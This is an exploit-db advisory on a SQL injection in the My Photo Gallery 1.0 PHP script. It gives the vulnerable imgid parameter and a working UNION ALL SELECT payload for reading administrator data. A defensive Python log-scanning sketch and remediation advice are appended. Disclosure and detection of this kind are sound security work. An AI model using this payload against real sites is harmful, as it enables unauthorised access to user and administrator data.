My Photo Gallery 1.0 – SQL Injection

  • Author: Kaan KAMIS
    Date: 2017-01-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41177/
  • Introduction
    
    Exploit Title: My Photo Gallery – SQL Injection
    Date: 27.01.2017
    Vendor Homepage: http://software.friendsinwar.com/
    Software Link: http://software.friendsinwar.com/news.php?readmore=40
    Exploit Author: Kaan KAMIS
    Contact: iletisim[at]k2an[dot]com
    Website: http://k2an.com
    Category: Web Application Exploits
     
    Overview
     
    My Photo Gallery is a free, user-friendly picture gallery script.
    Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
    The script comes with a very user-friendly admin system where you can change and add many things, such as categories, images, members, the site's look and many more.
    
    Type of vulnerability:
    
    An SQL Injection vulnerability in My Photo Gallery allows attackers to read
    arbitrary administrator data from the database.
    
    Vulnerable URL:
    
    http://localhost/my_photo_gallery/image.php?imgid=[payload]
    Vulnerable parameter: imgid
    Method: GET
    
    Payload:
    imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--
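
A detection sketch for the issue described above, added here as an example and not part of the original advisory: it scans web server access logs for `image.php` requests whose `imgid` value is not a plain integer. It assumes combined-format log lines and that legitimate `imgid` values are numeric IDs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL keywords worth naming in the alert; any non-numeric imgid is flagged regardless
SQL_HINT_RE = re.compile(r"\b(union|select|concat|sleep|benchmark|information_schema)\b", re.I)


def check_line(line):
    """Return None for benign lines, or a dict describing a suspicious imgid value."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/image.php"):
        return None
    # parse_qs percent-decodes the query, so encoded payloads are normalised first
    values = parse_qs(url.query, keep_blank_values=True).get("imgid", [])
    for value in values:
        # Assumption: a legitimate imgid is a short decimal ID
        if not re.fullmatch(r"\d{1,10}", value):
            hints = sorted({h.lower() for h in SQL_HINT_RE.findall(value)})
            return {"client": line.split(" ", 1)[0], "imgid": value, "sql_keywords": hints}
    return None


def scan(lines):
    """Return one finding per suspicious log line, in input order."""
    return [hit for hit in map(check_line, lines) if hit]


# Constructed sample log lines (documentation IP ranges), not taken from a real server
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jan/2017:10:00:01 +0000] "GET /my_photo_gallery/image.php?imgid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Jan/2017:10:00:05 +0000] "GET /my_photo_gallery/image.php?imgid=1%20UNION%20ALL%20SELECT%20NULL,NULL-- HTTP/1.1" 200 811',
    '198.51.100.7 - - [27/Jan/2017:10:00:09 +0000] "GET /my_photo_gallery/image.php?imgid=1%27 HTTP/1.1" 200 640',
    '192.0.2.10 - - [27/Jan/2017:10:00:12 +0000] "GET /my_photo_gallery/index.php?page=2 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is the fix on the application side: validate `imgid` as an integer and bind it as a query parameter instead of concatenating it into the SQL string.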